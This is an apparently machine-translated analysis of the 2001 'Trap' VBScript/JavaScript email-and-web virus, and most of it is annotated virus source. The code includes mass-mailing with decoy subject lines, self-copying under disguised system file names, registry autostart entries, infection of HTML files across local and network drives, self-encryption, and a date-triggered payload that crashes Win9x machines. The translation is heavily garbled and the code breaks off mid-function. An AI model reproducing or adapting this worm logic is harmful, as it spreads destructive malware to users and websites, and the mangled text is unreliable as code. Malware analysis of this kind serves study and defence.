In the beginning of July, there was a new vicious virus called "Trap" (TRAP), which has been fully explosive on July 5. At present, there have been a lot of websites and users from "trap" attacks, resulting in network systems.痪, the loss of documents is serious. The virus is a network scripting language virus, and it is also written in both VBScript and JavaScript, which spread through Outlook email (without opening mail can also be infected), infected file spread, strong communication ability, and Can directly attack the Microsoft IIS server homepage file, causing website infection, and is infected when visiting the website of the viral infection. From the virus attack object, "trap" is probably "domestic" virus, but it is understood that the virus is actually in June, first in South Korea. I am very unfortunately encountered "trap" attack, resulting in computer blue screen on July 5, and I have studied the source code of "trap". After some effort, I finally reveal the principle of code, the following is the third process of "trap" And the source code is detailed. The virus has its own encryption capabilities (using JavaScript coding technology), making ordinary users unable to see the virus origin, but there is no encryption in the infected VBS file, so as an entry point, I have a very easy source code. '@ Thank you! Make use of other person to get rid of an enemy , Mswkey, HCUW, Code_Str, VBS_STR, JS_STR DIM Defpath, Smailc, Max_Size Dim WHB (), Title (10) Smailc = 4
Redim WHB (SMAILC) 'White House Related Personnel Mail List
WHB (0) = "president@whitehouse.gov" WHB (1) = "vice.president@whitehouse.gov" WHB (2) = "first.lady@whitehouse.gov"
WHB (3) = "mrs.chey@whitehouse.gov"
'The theme of sending an email
Title (0) = "Thanks for Helping Me!" Title (1) = "The Police Are Investigating The Robbery" Title (2) = "An Application for a Job" Title (3) = "The Aspects of An Application Process Pertinent TO OSI "Title (4) =" What a pleasant weather. why not go out for a walk? "Title (5) =" these Countries Have Gone / Been Through Too Many Wars "Title (6) =" Weide Fixed On The 17th of April for the Wedding "Title (7) =" Title (8) = "The Sitting IS Open!" Title (9) = "DEFPATH =" C: /README.HTML "'virus file
Max_size = 100000 'Defines the maximum size of infectious files
Mswkey = "HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows /" HCUW = "HKEY_CURRENT_USER / SOFTWARE / Microsoft / WAB /" Main
Sub main () 'main program
ON Error ResMe Next Dim W_S
W_S = wscript.scriptfullname 'to get the path of the virus file itself
IF w_s = "" ". Err.clear
SET FSO = CREATEOBJECT ("scripting.filesystemObject") "Create a file system object
IF geterr the 'identifying virus status
Randomize 'initialization random seed
Ra = int (RND () * 7) 'generates a random number
Doucment.write Title (ra) 'writes random content
ExecuteMail 'When executing the message status
Else
ExecutePage 'When executing a web page status
END IF ELSE
Executevbs' Programs when performing VBS file status
End if End Sub Function GeterR () ignores Error If Err.Number <> 0 THETERR = True Err.Clear Else Geterr = FALSE END IF END FUNCTION
Sub executePage () program when () 'web page status
On Error ResMe Next Dim HTML_STR, ADI, WDF, WDF2, WDF3, WDSF, WDSF2, VF
VBS_STR = getScriptcode ("VBScript") 'Get VBScript code
JS_STR = getJavaScript () get JavaScript code
Code_Str = Makescript (Encrypt (VBS_STR), TRUE) 'Gets encrypted script code HTML_STR = Makehtml (Encrypt (VBS_STR), TRUE)' Get encrypted complete HTML code
GF
'Define the path to the virus file
WDSF = W2 & "MDM.VBS" WDSF2 = W1 & "Profile.vbs"
WDF = W2 & "User.dll" 'Note WDF and WDF3 two files are very confused
WDF2 = W2 & "Readme.html" WDF3 = W2 & "System.dll"
'Creating a virus file
Set vf = fso.opentextfile (WDF, 2, true) vf.write vbs_str vf.close set vf = fso.opentextFile (WDSF, 2, true) vf.write vbs_str vf.close set vf = fso.opentextfile (WDSF2, 2 , True) vf.write vbs_str vf.close set vf = fso.opentextfile (WDF2, 2, true) vf.write html_str vf.close set vf = fso.opentextFile (WDF3, 2, true) vf.write code_str vf.close Modify the registry, let the virus file start automatically execute WriteReg Mswkey & "CurrentVersion / Run / MDM", WDSF, "WriteReg Mswick &" CurrentVersion / Runservices / Profile ", WDSF2," "
Sendmail 'Execute Send Mail Programs
Hackpage 'Performs Infection Website Program
Set adi = fso.drives for Each X in Adi
If x.drivestype = 2 or x.drivestype = 3 TEN 'Traces all local hard drives and network sharing hard drives
Call searchhtml (x & "/") 'Execute a file infection
Endiff next
If Testuser Ten 'Check User
Killhe performs delete file operations ELSE
If Month (Date) & day (date) = "75" THEN ', if the system time is July 5
Set vf = fso.opentextfile (W2 & "75.htm", 2, true) 'Creating a system attack file
vf.write makescript ("Window.naviGate ('c: / con / con');", false) vf.close
WriteReg Mswkey & "CurrentVersion / Run / 75", W2 & "75.htm", "" "automatic startup
WINDOW.NAVIGATE "C: / Con / Con" is immediately blue screen, using Windows bug, can cause 100% crash in Win9x system (ie, unrecoverable blue screen)
Else 'is not 7.5
IF fso.fileexists (W2 & "75.htm") THEN FSO.DELETEFILE W2 & "75.htm" 'Delete 75.htmend IF End IF
If fso.fileexists (defpath) Then fso.deletefile defpath 'Delete C: /Readme.html virus file
End Sub
Sub executemail () program executed when mail status
On Error ResMe next VBS_STR = GetScriptCode ("VBScript") js_str = getjavaScript ()
SET STL = CREATEOBJECT ("Scriptlet.Typelib") 'Creating a TypeLib object
With stl .reset .path = defpath .doc = makehtml (Encrypt (VBS_STR), TRUE
.Write () 'Creating a C: /Readme.html file
End with window.open defpath, "trap", "width = 1 height = 1 menubar = no scrollbars = no barbar = no" opens the window end SUB
Sub Executevbs () The reason, such as the virus file is executed when VBS is VBS
on error resume next dim x, adi, wvbs, ws, vf set fso = CreateObject ( "Scripting.FileSystemObject") set wvbs = CreateObject ( "WScript.Shell") Gf wvbs.RegWrite MSWKEY & "Windows Scripting Host / Setings / Timeout ", 0," REG_DWORD "set vf = fso.opentextfile (W2 &" System.dll ", 1) code_str = vf.readall () vf.close Hackpage Sendmail Set Adi = fso.drives for Each X in Adi IF X. Drivestype = 2 or x.drivestype = 3 THEN CALL SEARCHTML (X & "/") End if Next If Testuser Ten Killhe End Sub
SUB GF () 'Getting System Path
W1 = fso.getspecialfolder (0) & "/" w2 = fso.getspecialfolder (1) & "/" End Sub
Function Readreg (key_str) 'Read Registry
SET TMPS = CreateObject ("wscript.shell") readreg = tmps.regread (key_str) set tmps = Nothing end function
Function WriteReg (Key_STR, NewValue, VTYPE) 'Write Registry
set tmps = CreateObject ( "WScript.Shell") if vtype = "" then tmps.RegWrite key_str, Newvalue else tmps.RegWrite key_str, Newvalue, vtype end if set tmps = Nothing end functionfunction MakeHtml (Sbuffer, iHTML) 'create an HTML file Complete code
Dim randomize ra = int (RND () * 7) makehtml = "<" & "html> <" & "head> <" & "title>" & title (ra) < "&" / Head> "& _
Function Makescript (CODESTR, IHTML) 'This program is a virus to self-encrypt the process, which is more complicated, no longer described.
If html dam docuwrite docuwrite = "Document.write ('<' " & "'script language = javascript> / n' " & _ "jword" & " '/ n '); "DOCUWRITE = Docuwrite & Vbrlf &" Document.write (' <' "&"' script language = vbscript> / n ' "& _" NWORD "&" ' / n ');" Makescript = "<" Script language = javascript> "& vbcrf &" var jword = "& _ chr (34) & encrypt (js_str) & chr (34) & vbcrf &" Var nword = "& _ chr (34) & CODESTR & CHR (34) & vbrlf &" nword = unescape (nword); "& VBCRLF & _" JWORD = Unescape (jword); "& Vbcrf & Docuwrite & Vbcrlf &" "else makesscript = <" "Script language = JavaScript>" & CodeStr & "
